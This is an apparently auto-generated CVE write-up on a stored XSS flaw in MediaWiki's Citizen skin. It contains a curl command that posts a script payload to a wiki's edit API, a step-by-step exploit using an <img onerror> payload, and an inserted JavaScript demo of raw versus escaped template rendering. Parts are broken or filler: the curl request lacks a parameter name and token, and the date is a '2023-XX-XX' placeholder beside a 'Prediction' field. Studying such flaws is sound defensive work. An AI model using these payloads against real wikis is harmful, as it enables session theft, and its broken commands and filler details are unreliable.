How the CVE Works
The vulnerability occurs in the Citizen skin for MediaWiki when page descriptions are inserted into raw HTML without proper sanitization. This affects the old search bar functionality, allowing unsanitized user input to be rendered as HTML. Attackers can inject malicious scripts via page edits, which execute when other users search for the affected pages. The issue stems from improper handling of descriptions in `TypeaheadListItem.mustache`, where user-supplied content is directly embedded into the DOM without escaping.
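The raw versus escaped interpolation described above, as an added example that is not the Citizen skin's own code: a small Mustache-style renderer run against a constructed search result carrying the `onerror` payload from this page. The templates, field names and helper functions are assumptions made for illustration.

```javascript
// Added example: minimal Mustache-style renderer (illustrative, not Citizen's code).
// {{{name}}} inserts the value raw; {{name}} HTML-escapes it first.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

function render(template, view) {
  // The triple-brace alternative is listed first so it is matched before
  // the double-brace rule can consume part of it.
  const tag = /\{\{\{\s*(\w+)\s*\}\}\}|\{\{\s*(\w+)\s*\}\}/g;
  return template.replace(tag, (match, rawKey, escapedKey) => {
    const key = rawKey || escapedKey;
    const value = view[key] == null ? '' : view[key];
    return rawKey ? String(value) : escapeHtml(value);
  });
}

// Hypothetical templates for one search suggestion (assumed markup).
const VULNERABLE_TEMPLATE =
  '<li><span class="title">{{title}}</span><span class="desc">{{{desc}}}</span></li>';
const FIXED_TEMPLATE =
  '<li><span class="title">{{title}}</span><span class="desc">{{desc}}</span></li>';

// Constructed search result: the description is user-editable page content.
const SAMPLE_RESULT = {
  title: 'TestXSS',
  desc: '<img src="" onerror="alert(\'XSS\')">',
};

// True when the description survived as a live tag instead of inert text.
function descriptionBecameMarkup(html) {
  return /<img\b/i.test(html);
}

function compareTemplates(result) {
  const vulnerable = render(VULNERABLE_TEMPLATE, result);
  const fixed = render(FIXED_TEMPLATE, result);
  return {
    vulnerable,
    fixed,
    vulnerableIsLive: descriptionBecameMarkup(vulnerable),
    fixedIsLive: descriptionBecameMarkup(fixed),
  };
}

console.log(compareTemplates(SAMPLE_RESULT));
```
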
DailyCVE Form
Platform: MediaWiki
Version: Citizen skin (pre-patch)
Vulnerability: Stored XSS
Severity: Critical
Date: 2023-XX-XX
Prediction: Patch expected Q4 2023
What Undercode Say
```bash
# Check if Citizen skin is installed
grep -r "Citizen" /var/www/html/skins/

# Verify search gateway setting
cat LocalSettings.php | grep "wgCitizenSearchGateway"

# Test XSS payload
curl -X POST "http://wiki.example.com/api.php" --data "action=edit&=TestXSS&text=<script>alert(1)</script>"
```
How Exploit
1. Edit a wiki page with `<img src="" onerror="alert('XSS')">`.
2. Disable command palette via `$wgCitizenEnableCommandPalette = false;`.
3. Search for the page—payload executes.
Protection from this CVE
- Update Citizen skin.
- Enable HTML sanitization.
- Use CSP headers.
Impact
- Arbitrary JS execution.
- Session hijacking.
- Privilege escalation.
Sources:
Reported By: github.com